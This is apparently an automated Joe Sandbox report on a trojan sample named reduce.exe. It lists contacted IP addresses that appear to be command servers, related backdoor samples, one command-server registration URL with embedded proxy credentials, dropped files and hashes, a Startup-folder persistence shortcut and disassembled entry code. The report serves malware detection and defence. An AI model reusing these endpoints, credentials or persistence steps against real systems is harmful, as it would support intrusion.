    http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y | reduce.exe, 00000000.00000002.1716346244.000000000666C000.00000004.00000020.00020000.00000000.sdmp, Client32.exe, 00000008.00000002.1989442077.00000000067A7000.00000004.00000020.00020000.00000000.sdmp | false | | high
    http://ocsp.sectigo.com0 | reduce.exe, 00000000.00000002.1716346244.000000000666C000.00000004.00000020.00020000.00000000.sdmp, Client32.exe, 00000008.00000002.1989442077.00000000067A7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    http://38.180.205.164http://46.8.232.106 | msiexec.exe, 00000007.00000002.2956126032.000000000ED0C000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2956126032.000000000ED22000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    http://46.8.232.106 | msiexec.exe, 00000007.00000002.2956126032.000000000ED22000.00000004.00001000.00020000.00000000.sdmp | false | | high
    https://home.hccnet.nl/s.j.francke/colorcatcher/index.html | reduce.exe | false | Avira URL Cloud: safe | unknown
    http://188.130.206.243 | msiexec.exe, 00000007.00000002.2956126032.000000000ED22000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    https://www.lazarus-ide.org/ | reduce.exe | false | Avira URL Cloud: safe | unknown
    http://38.180.205.164 | msiexec.exe, 00000007.00000002.2956126032.000000000ED22000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    http://www.info-zip.org/ | reduce.exe, 00000000.00000002.1718553599.0000000009496000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2006666674.0000000004852000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2953875021.0000000005771000.00000004.00000800.00020000.00000000.sdmp, Client32.exe, 00000008.00000002.1991442213.000000000946E000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000009.00000002.2214539573.0000000004AEB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2216585430.0000000004BBE000.00000004.00000800.00020000.00000000.sdmp | false | | high
    http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0# | reduce.exe, 00000000.00000002.1716346244.000000000666C000.00000004.00000020.00020000.00000000.sdmp, Client32.exe, 00000008.00000002.1989442077.00000000067A7000.00000004.00000020.00020000.00000000.sdmp | false | | high
    http://188.130.206.24338.180.205.164:80P& | msiexec.exe, 00000007.00000002.2956257148.000000000ED96000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    http://46.8.232.106P. | msiexec.exe, 00000007.00000002.2955110668.000000000EC7C000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    http://46.8.236.61 | msiexec.exe, 00000007.00000002.2956126032.000000000ED22000.00000004.00001000.00020000.00000000.sdmp | false | | high
    http://46.8.236.61P | msiexec.exe, 00000007.00000002.2955110668.000000000EC96000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    https://github.com/jbsolucoes/ucp | reduce.exe, 00000000.00000002.1720577037.00000001010CC000.00000008.00000001.01000000.00000003.sdmp, reduce.exe, 00000000.00000002.1716346244.000000000666C000.00000004.00000020.00020000.00000000.sdmp, Client32.exe, 00000008.00000000.1958521441.00000001010CC000.00000008.00000001.01000000.0000000B.sdmp, Client32.exe, 00000008.00000002.1989442077.00000000067A7000.00000004.00000020.00020000.00000000.sdmp | false | | high
    http://91.212.166.91 | msiexec.exe, 00000007.00000002.2956126032.000000000ED22000.00000004.00001000.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
46.8.232.106 | unknown | Russian Federation | 28917 | FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | false
188.130.206.243 | unknown | Russian Federation | 200509 | SVINT-ASNES | false
185.121.233.152 | unknown | Spain | 198432 | IPCORE-ASES | true
91.212.166.91 | unknown | United Kingdom | 35819 | MOBILY-ASEtihadEtisalatCompanyMobilySA | false
38.180.205.164 | unknown | United States | 174 | COGENT-174US | false
46.8.236.61 | unknown | Russian Federation | 28917 | FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | false
                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1568776
                          Start date and time:2024-12-04 23:22:07 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 8m 6s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:13
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:reduce.exe
                          Detection:MAL
                          Classification:mal100.troj.evad.winEXE@12/8@0/6
                          EGA Information:
                          • Successful, ratio: 66.7%
                          HCA Information:Failed
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target msiexec.exe, PID 8024 because there are no executed functions
• Not all processes were analyzed, report is missing behavior information
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • VT rate limit hit for: reduce.exe
Time | Type | Description
17:23:02 | API Interceptor | 1x Sleep call for process: reduce.exe modified
17:23:29 | API Interceptor | 1x Sleep call for process: Client32.exe modified
22:23:18 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Client32.lnk
Match | Associated Sample Name / URL | Detection | Threat Name | Context
46.8.232.106 | InsertSr.exe | malicious | GO Backdoor | 46.8.232.106/
 | iKhdG3bwZK.exe | malicious | GO Backdoor | 46.8.232.106:30001/api/helper-first-register?buildVersion=0Z5V.TE82Oth&md5=044037796cf2d13eadf0217833d52e65&proxyPassword=2kXPzHVW&proxyUsername=6R0WzU7T&userId=IzhXMyKsSA8bmnLPaD5erUdWtcou
 | Week11.exe | malicious | GO Backdoor | 46.8.232.106/
 | Week11.exe.bin.exe | malicious | GO Backdoor | 46.8.232.106/
 | m0Yc9KltGw.exe | malicious | GO Backdoor | 46.8.232.106/
 | SecuriteInfo.com.FileRepMalware.7838.24766.exe | malicious | GO Backdoor | 46.8.232.106/
 | BwqqVoHR71.exe | malicious | GO Backdoor | 46.8.232.106/
 | BwqqVoHR71.exe | malicious | GO Backdoor | 46.8.232.106/
 | sV9ElC4fU4.exe | malicious | GO Backdoor | 46.8.232.106/
 | antispam_connect1.exe | malicious | GO Backdoor | 46.8.232.106/
188.130.206.243 | InsertSr.exe | malicious | GO Backdoor | 188.130.206.243/
 | iKhdG3bwZK.exe | malicious | GO Backdoor | 188.130.206.243:30001/api/helper-first-register?buildVersion=0Z5V.TE82Oth&md5=044037796cf2d13eadf0217833d52e65&proxyPassword=2kXPzHVW&proxyUsername=6R0WzU7T&userId=IzhXMyKsSA8bmnLPaD5erUdWtcou
 | Week11.exe | malicious | GO Backdoor | 188.130.206.243/
 | Week11.exe.bin.exe | malicious | GO Backdoor | 188.130.206.243/
 | m0Yc9KltGw.exe | malicious | GO Backdoor | 188.130.206.243/
 | SecuriteInfo.com.FileRepMalware.7838.24766.exe | malicious | GO Backdoor | 188.130.206.243/
 | BwqqVoHR71.exe | malicious | GO Backdoor | 188.130.206.243/
 | BwqqVoHR71.exe | malicious | GO Backdoor | 188.130.206.243/
 | antispam_connect1.exe | malicious | GO Backdoor | 188.130.206.243/
                          No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
SVINT-ASNES | InsertSr.exe | malicious | GO Backdoor | 188.130.206.243
 | x86_64.nn.elf | malicious | Mirai, Okiru | 188.130.200.151
 | iKhdG3bwZK.exe | malicious | GO Backdoor | 188.130.206.243
 | Week11.exe | malicious | GO Backdoor | 188.130.206.243
 | Week11.exe.bin.exe | malicious | GO Backdoor | 188.130.206.243
 | m0Yc9KltGw.exe | malicious | GO Backdoor | 188.130.206.243
 | https://t.ly/Oppenheim0511 | malicious | GO Backdoor | 188.130.206.243
 | SecuriteInfo.com.FileRepMalware.7838.24766.exe | malicious | GO Backdoor | 188.130.206.243
 | https://t.ly/BavariaFilmGmbH2410 | malicious | Unknown | 188.130.206.243
 | BwqqVoHR71.exe | malicious | GO Backdoor | 188.130.206.243
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | InsertSr.exe | malicious | GO Backdoor | 46.8.236.61
 | iKhdG3bwZK.exe | malicious | GO Backdoor | 46.8.236.61
 | ppc.elf | malicious | Mirai | 46.8.228.104
 | file.exe | malicious | Cryptbot | 46.8.237.112
 | file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | 46.8.237.112
 | file.exe | malicious | Clipboard Hijacker, Cryptbot | 46.8.237.112
 | Week11.exe | malicious | GO Backdoor | 46.8.236.61
 | Week11.exe.bin.exe | malicious | GO Backdoor | 46.8.236.61
 | m0Yc9KltGw.exe | malicious | GO Backdoor | 46.8.236.61
 | https://t.ly/Oppenheim0511 | malicious | GO Backdoor | 46.8.232.106
MOBILY-ASEtihadEtisalatCompanyMobilySA | teste.mips.elf | malicious | Gafgyt, Mirai, Moobot, Okiru | 86.51.206.7
 | la.bot.arm7.elf | malicious | Mirai | 176.224.118.112
 | x86_64.nn.elf | malicious | Mirai, Okiru | 37.43.193.195
 | sh4.nn.elf | malicious | Mirai, Okiru | 37.243.106.195
 | botnet.sh4.elf | malicious | Mirai, Moobot | 176.16.239.106
 | la.bot.mips.elf | malicious | Unknown | 176.16.239.121
 | x86_64.elf | malicious | Mirai | 37.127.151.127
 | loligang.spc.elf | malicious | Mirai | 46.240.95.184
 | loligang.x86.elf | malicious | Mirai | 37.124.22.117
 | InsertSr.exe | malicious | GO Backdoor | 91.212.166.91
IPCORE-ASES | m0Yc9KltGw.exe | malicious | GO Backdoor | 185.121.233.152
 | Lisect_AVT_24003_G1B_122.exe | malicious | Unknown | 185.18.198.253
 | Lisect_AVT_24003_G1B_122.exe | malicious | Unknown | 185.18.198.253
 | SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe | malicious | AgentTesla | 185.18.198.253
 | n1KVzXM8Wk.exe | malicious | AgentTesla | 185.18.198.253
 | PO #1131011152-2024-Order,pdf.exe | malicious | AgentTesla | 185.18.198.253
 | SecuriteInfo.com.Win64.ExploitX-gen.17969.12173.exe | malicious | AgentTesla | 185.18.198.253
 | Scan 20.02.24.pdf.exe | malicious | AgentTesla | 185.18.198.253
 | https://facturamecr.com/Citrix-Sharefile-Portal/index.html | malicious | HTMLPhisher | 5.2.88.91
 | PROFORMA INVOICE.doc | malicious | Unknown | 5.2.91.169
                          No context
                          No context
                          Process:C:\Users\user\Desktop\reduce.exe
                          File Type:PNG image data, 2992 x 2913, 8-bit/color RGB, non-interlaced
                          Category:dropped
                          Size (bytes):7299666
                          Entropy (8bit):7.997731766327472
                          Encrypted:true
                          SSDEEP:196608:HxEa9y3BUh6ia+s3RtmMjVA+KPDibr5u5FC:HxEp3yQtx3pZA+K+bATC
                          MD5:3B8A3AAC7469ECC5FA531D9B86C2DFD9
                          SHA1:1FBC633341E3B4F5E269C044B9B99ABE2D2723DB
                          SHA-256:64F0992F6070AA9C459E59B6CD1523D2CD98AF29941501FFA262F9DF412371A3
                          SHA-512:6B234FC6B2D39B8FE53354D0DB2713AE2E4DE4C4D12FCE81FDFE326A9063B3415EAD9C8831FCFBCC4490E99155FC35DAF48069F3C781E57465D867EE6F257976
                          Malicious:false
                          Reputation:low
                          Process:C:\Users\user\Desktop\reduce.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):8279157
                          Entropy (8bit):7.947192595777569
                          Encrypted:false
                          SSDEEP:196608:sSSpNEjbjo/qtkPUomsEeUrB7LcBK89onqTOik59DfF:NSQbqtE9K3a4O3
                          MD5:B923BC8C4D6C694F3EAC3F305EC48327
                          SHA1:21FB514F86507C80370D49861FCAE8A9D8D72E5E
                          SHA-256:3BCC2B09B395CD92B98853E6578268EA569B4B2B6FB32EF534C316F1081FA291
                          SHA-512:736AEEAA4448576A80892A8812D782B3E94F38D6643FF2972AF04C6278AA5AEC2DD4747CFF256097DFAB87AA913179F0CCA79FD4CCB89BB7548A12B935643A96
                          Malicious:false
                          Process:C:\Users\user\AppData\Roaming\jion\Client32.exe
                          File Type:PNG image data, 2992 x 2913, 8-bit/color RGB, non-interlaced
                          Category:dropped
                          Size (bytes):7299666
                          Entropy (8bit):7.997731766327472
                          Encrypted:true
                          SSDEEP:196608:HxEa9y3BUh6ia+s3RtmMjVA+KPDibr5u5FC:HxEp3yQtx3pZA+K+bATC
                          MD5:3B8A3AAC7469ECC5FA531D9B86C2DFD9
                          SHA1:1FBC633341E3B4F5E269C044B9B99ABE2D2723DB
                          SHA-256:64F0992F6070AA9C459E59B6CD1523D2CD98AF29941501FFA262F9DF412371A3
                          SHA-512:6B234FC6B2D39B8FE53354D0DB2713AE2E4DE4C4D12FCE81FDFE326A9063B3415EAD9C8831FCFBCC4490E99155FC35DAF48069F3C781E57465D867EE6F257976
                          Malicious:false
                          Process:C:\Users\user\AppData\Roaming\jion\Client32.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):8279157
                          Entropy (8bit):7.947195576132262
                          Encrypted:false
                          SSDEEP:196608:USSpNEjbjo/qtkPUomsEeUrB7LcBK89onqTOik59DfF:lSQbqtE9K3a4O3
                          MD5:676FEE4F51C524DD11AD26B09C8381AF
                          SHA1:82FC9BC85188C02D81CB6AB1470B52C20447B75E
                          SHA-256:B087711B7E19BC2B710E97DF9EC4F113DAC5CFBABD535F7B1D2F11FB3049591A
                          SHA-512:BD5DB03565243BD734F2961F36A79021E0B3BB2FF2DA7A10DB99B3088CB17DFE11B3218B37439F2E89DE366E04F9C8C257418B9EFBAEA27D42B8124ED24F6E25
                          Malicious:false
                          Process:C:\Windows\SysWOW64\more.com
                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Oct 4 11:02:29 2023, mtime=Wed Dec 4 21:23:01 2024, atime=Wed Dec 4 21:22:58 2024, length=18233144, window=hide
                          Category:dropped
                          Size (bytes):862
                          Entropy (8bit):5.0509286712090695
                          Encrypted:false
                          SSDEEP:24:8mOdpk+gOWWoKPhBlDyA7w3RUBOhlpFbBm:8mk0RWvl9k3flpv
                          MD5:843FE8A25DEDFE87D3FB6F41F6CFE072
                          SHA1:87C7FD8643C90572FCE17CE5F27A1BBBE12F3B61
                          SHA-256:8B3EFC3787E1BA99CCF2CCD66D332B59AF6808E73FB1ABDA3735C261F25CA37D
                          SHA-512:D2145F7D6F6478A8D6D36F21A863659019102B2935D69C46D1E92ED1160F8B9F01DAB7A75199564E5C628087BF5532844AE2B553DC171B89DCAC9B08BD017D11
                          Malicious:false
                          Process:C:\Windows\SysWOW64\more.com
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):7547904
                          Entropy (8bit):6.177118093553273
                          Encrypted:false
                          SSDEEP:98304:R7TGVb21psfEKGulAEGviPnj7ipFq6LsP5F973Ewh:NTpsfkFq6k5F973n
                          MD5:DBEB491070512C238525522FD6DC7714
                          SHA1:C62B9436849563A14422C5A2C9DEFA5FFE104B06
                          SHA-256:CD8BA142563CC184BD42F47AD3F29AF756C2F5789DC9BF1AF91003C3021F3D79
                          SHA-512:906FC643D13AAF21B8D3A929D028D2C89B8B21B5253C6C22DA134B700ED62C5F3DF96A75ED9DB9AF61B95C281C7C954C07FA846346042D9A2A2BD263FCCB703C
                          Malicious:true
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 47%
                          Process:C:\Windows\SysWOW64\more.com
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):7547904
                          Entropy (8bit):6.177118093553273
                          Encrypted:false
                          SSDEEP:98304:R7TGVb21psfEKGulAEGviPnj7ipFq6LsP5F973Ewh:NTpsfkFq6k5F973n
                          MD5:DBEB491070512C238525522FD6DC7714
                          SHA1:C62B9436849563A14422C5A2C9DEFA5FFE104B06
                          SHA-256:CD8BA142563CC184BD42F47AD3F29AF756C2F5789DC9BF1AF91003C3021F3D79
                          SHA-512:906FC643D13AAF21B8D3A929D028D2C89B8B21B5253C6C22DA134B700ED62C5F3DF96A75ED9DB9AF61B95C281C7C954C07FA846346042D9A2A2BD263FCCB703C
                          Malicious:true
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 47%
                          Process:C:\Windows\SysWOW64\msiexec.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):248
                          Entropy (8bit):6.119542041160086
                          Encrypted:false
                          SSDEEP:6:e8bfQDOwfVQq7z1ylE2xkuRq5wmhss71pTdE/P6KmIlW3n:HgfVQq7z0C2xkh6m2s71tKmIlCn
                          MD5:3E9248408B029C4D008F1F4012241730
                          SHA1:B93CBD96EA92D09C60E154DBFBA61AAA4D5562C8
                          SHA-256:D4105E0F7FD6533F3FFAE42949F62B025437BA08F23E8943ED9A696E18F2895E
                          SHA-512:A24472A16E2B27A50381A93656A95E64BCF37D17E31E09F53362CA8569845A4C26BB8FDE64B7E532A947D0D7371304D3696FABF0F785D0F0C0481491509BDD51
                          Malicious:false
                          File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                          Entropy (8bit):7.084738149143265
                          TrID:
                          • Win64 Executable (generic) (12005/4) 74.95%
                          • Generic Win/DOS Executable (2004/3) 12.51%
                          • DOS Executable Generic (2002/1) 12.50%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                          File name:reduce.exe
                          File size:18'233'144 bytes
                          MD5:b0f4c61f99716127097da80d07ed6123
                          SHA1:310e490a366e2d55b27417f545e4abd575fad0a3
                          SHA256:fdb10dd37d214b1e9e4258e601a6b3d7a3d9615513b3e0afaad8d9cc09481087
                          SHA512:4bd2bbe23689d636a4725a015d5f685057bbad1dbddc9cf038c632c182b7e39241648b86ed3f0d17c04cbe1bc3bbe1ccf28f2ab532f96ed089c3545315686d9d
                          SSDEEP:196608:Izx+2j3JYwC+dbhxEa9y3BUh6ia+s3RtmMjVA+KPDibr5u5FOW2R:Izx+eYsbhxEp3yQtx3pZA+K+bATOWu
                          TLSH:E3078EFBB5228B94C0CEC5B4249797EA9F21BC2C04B6138261DA271F9F76C805D598DF
                          Icon Hash:edeaa6a6e66a4202
                          Entrypoint:0x1000030a0
                          Entrypoint Section:.text
                          Digitally signed:true
                          Imagebase:0x100000000
                          Subsystem:windows gui
                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
                          DLL Characteristics:
                          Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                          TLS Callbacks:0x3010, 0x1
                          CLR (.Net) Version:
                          OS Version Major:4
                          OS Version Minor:0
                          File Version Major:4
                          File Version Minor:0
                          Subsystem Version Major:4
                          Subsystem Version Minor:0
                          Import Hash:61876e4043b7e6c5a61a84484ce47785
                          Signature Valid:false
                          Signature Issuer:CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
                          Signature Validation Error:The digital signature of the object did not verify
                          Error Number:-2146869232
                          Not Before, Not After
                          • 23/02/2023 19:00:00 23/05/2026 19:59:59
                          Subject Chain
                          • CN=Alexandre Kozlov, O=Alexandre Kozlov, S=Alberta, C=CA
                          Version:3
                          Thumbprint MD5:318527605F09093E89D869D57482C65A
                          Thumbprint SHA-1:3154B78334E2E397068DDC6DADC813A4D4E89F3E
                          Thumbprint SHA-256:EA87869BD3D0A68F60BAE0D2E802220BD11FC1DB457C02996EDD05C7BBE2CE10
                          Serial:00DC630D1C4604E36B1C380E74B8EB2358
                          Instruction
                          push ebp
                          dec eax
                          mov ebp, esp
                          dec eax
                          lea esp, dword ptr [esp-20h]
                          mov byte ptr [005E3E90h], 00000000h
                          dec esp
                          lea eax, dword ptr [009C5F49h]
                          dec eax
                          lea edx, dword ptr [009C5F4Ah]
                          dec eax
                          lea ecx, dword ptr [005E2FABh]
                          call 00007F0B54BB63CBh
                          call 00007F0B54BB63D6h
                          dec eax
                          lea ecx, dword ptr [005E2F3Ah]
                          call 00007F0B54BCC47Ah
                          nop
                          dec eax
                          lea esp, dword ptr [ebp+00h]
                          pop ebp
                          ret
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          push ebp
                          dec eax
                          mov ebp, esp
                          dec eax
                          lea esp, dword ptr [esp-20h]
                          call 00007F0B54BC5CB7h
                          mov byte ptr [005E4AFBh], 00000001h
                          dec eax
                          mov eax, dword ptr [005E4AC4h]
                          mov byte ptr [eax+00000258h], 00000001h
                          dec eax
                          mov ecx, dword ptr [005E4AB6h]
                          dec eax
                          mov eax, dword ptr [005E4AAFh]
                          dec eax
                          mov eax, dword ptr [eax]
                          call dword ptr [eax+000001E8h]
                          dec esp
                          lea eax, dword ptr [009AC95Fh]
                          dec eax
                          mov ecx, dword ptr [005E4A98h]
                          dec eax
                          lea edx, dword ptr [0066F929h]
                          call 00007F0B54BE2C71h
                          dec esp
                          lea eax, dword ptr [009ACBD5h]
                          dec eax
                          mov ecx, dword ptr [005E4A7Eh]
                          dec eax
                          lea edx, dword ptr [0067D8A7h]
                          call 00007F0B54BE2C57h
                          dec esp
                          lea eax, dword ptr [009ACABBh]
                          dec eax
                          mov ecx, dword ptr [00000000h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x9ca000 | 0xf0 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x9cf000 | 0x7b4052 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x94f000 | 0x5d99c | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x1162e00 | 0x938 | .rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x5e6070 | 0x28 | .data
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9cb138 | 0x1048 | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5e4890 | 0x5e4a00 | 15048f99246b3103cf1a094812c6be60 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x5e6000 | 0x7f624 | 0x7f800 | 04dc067aca24148b6badf21f4880b783 | False | 0.5578182444852942 | DOS executable (block device driver) | 6.338975821321393 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x666000 | 0x2e82dc | 0x2e8400 | 703251b2fb8e919187eb6893f203c3fa | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.pdata | 0x94f000 | 0x5d99c | 0x5da00 | c7be05cc7639db76c46a146456b44e20 | False | 0.5105374874833111 | data | 6.46474710165666 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bss | 0x9ad000 | 0x1b458 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT | 0x9c9000 | 0x18 | 0x200 | caaccb6f88100938b328d46db354419f | False | 0.03515625 | data | 0.06116285224115448 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x9ca000 | 0x44a2 | 0x4600 | e20ecdd239f673b5f32d56733490c7ca | False | 0.25100446428571427 | data | 4.348206593435725 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x9cf000 | 0x7b4052 | 0x7b4200 | 4b4b12e5b75ec3edbf08409a9b5b1310 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
HQTO | 0x9d6a80 | 0x6f6252 | PNG image data, 2992 x 2913, 8-bit/color RGB, non-interlaced | English | United States | 0.9997720718383789
RT_CURSOR | 0x10cccd4 | 0x134 | data | | | 0.12012987012987013
RT_CURSOR | 0x10cce08 | 0x134 | data | | | 0.2305194805194805
RT_CURSOR | 0x10ccf3c | 0x134 | data | | | 0.4935064935064935
RT_CURSOR | 0x10cd070 | 0x334 | data | | | 0.24634146341463414
RT_CURSOR | 0x10cd3a4 | 0x434 | data | | | 0.24814126394052044
RT_CURSOR | 0x10cd7d8 | 0x134 | Targa image data - Map - RLE 64 x 65536 x 1 +32 "\001" | | | 0.5
RT_CURSOR | 0x10cd90c | 0x334 | data | | | 0.24634146341463414
RT_CURSOR | 0x10cdc40 | 0x434 | Targa image data 128 x 65536 x 1 +64 "\001" | | | 0.24349442379182157
RT_CURSOR | 0x10ce074 | 0x134 | data | | | 0.36688311688311687
RT_CURSOR | 0x10ce1a8 | 0x334 | data | | | 0.2146341463414634
RT_CURSOR | 0x10ce4dc | 0x434 | data | | | 0.18680297397769516
RT_CURSOR | 0x10ce910 | 0x134 | Targa image data 64 x 65536 x 1 +32 "\001" | | | 0.36688311688311687
RT_CURSOR | 0x10cea44 | 0x334 | Targa image data - RLE 96 x 65536 x 1 +48 "\001" | | | 0.20609756097560974
RT_CURSOR | 0x10ced78 | 0x434 | Targa image data - Color 128 x 65536 x 1 +64 "\001" | | | 0.17657992565055763
RT_CURSOR | 0x10cf1ac | 0x134 | data | | | 0.5844155844155844
RT_CURSOR | 0x10cf2e0 | 0x334 | data | | | 0.3
RT_CURSOR | 0x10cf614 | 0x434 | data | | | 0.2983271375464684
RT_CURSOR | 0x10cfa48 | 0x134 | Targa image data - Map - RLE 64 x 65536 x 1 +32 "\001" | | | 0.42857142857142855
RT_CURSOR | 0x10cfb7c | 0x334 | data | | | 0.2280487804878049
RT_CURSOR | 0x10cfeb0 | 0x434 | Targa image data 128 x 65536 x 1 +64 "\001" | | | 0.23513011152416358
RT_CURSOR | 0x10d02e4 | 0x134 | Targa image data - Map - RLE 64 x 65536 x 1 +32 "\001" | | | 0.5
RT_CURSOR | 0x10d0418 | 0x334 | data | | | 0.24634146341463414
RT_CURSOR | 0x10d074c | 0x434 | Targa image data 128 x 65536 x 1 +64 "\001" | | | 0.24349442379182157
RT_CURSOR | 0x10d0b80 | 0x134 | data | | | 0.2662337662337662
RT_CURSOR | 0x10d0cb4 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | | | 0.38311688311688313
RT_CURSOR | 0x10d0de8 | 0x134 | data | | | 0.3538961038961039
RT_CURSOR | 0x10d0f1c | 0x134 | data | Serbian | Italy | 0.34415584415584416
RT_BITMAP | 0x10d1050 | 0x908 | Device independent bitmap graphic, 50 x 24 x 8, image size 1248 | Portuguese | Brazil | 0.28027681660899656
RT_ICON | 0x10d1958 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | Portuguese | Brazil | 0.5013440860215054
RT_ICON | 0x10d1c40 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1152 | | | 0.621841155234657
RT_DIALOG | 0x10d24e8 | 0x32 | data | | | 0.76
RT_RCDATA | 0x10d251c | 0x111 | PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced | | | 1.0
RT_RCDATA | 0x10d2630 | 0x11f | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 0.9930313588850174
RT_RCDATA | 0x10d2750 | 0x139 | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | | | 0.9904153354632588
RT_RCDATA | 0x10d288c | 0x163 | PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced | | | 1.0225352112676056
RT_RCDATA | 0x10d29f0 | 0x1dc | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 1.023109243697479
